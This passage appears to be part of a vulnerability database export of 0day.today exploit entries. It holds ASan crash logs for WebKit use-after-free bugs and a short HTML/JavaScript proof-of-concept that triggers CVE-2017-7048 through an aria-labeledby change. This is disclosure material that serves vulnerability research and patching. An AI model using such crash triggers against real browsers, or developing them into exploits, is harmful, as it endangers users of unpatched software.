(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n-->\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28176"}, {"lastseen": "2018-02-16T05:10:25", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "title": "WebKit - WebCore::AccessibilityNodeObject::textUnderElement Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28181", "id": "1337DAY-ID-28181", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249\r\n \r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n #31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)\r\n #32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)\r\n #33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)\r\n #34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)\r\n #35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)\r\n #36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)\r\n #37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n \r\n0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)\r\nfreed by thread T0 here:\r\n #0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)\r\n #3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)\r\n #4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)\r\n #5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)\r\n #6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)\r\n #7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)\r\n #8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)\r\n #9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)\r\n #10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)\r\n #11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)\r\n #14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)\r\n #16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)\r\n #17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)\r\n #18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)\r\n #19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)\r\n #7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)\r\n #8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)\r\n #9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)\r\n #10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)\r\n #11 